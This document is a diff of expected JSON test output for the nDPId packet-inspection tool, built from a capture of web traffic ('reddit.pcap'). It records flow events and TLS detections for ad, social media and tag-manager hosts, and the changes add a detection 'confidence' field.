 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="}
-00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01303{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01004{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01329{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="}
-00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="}
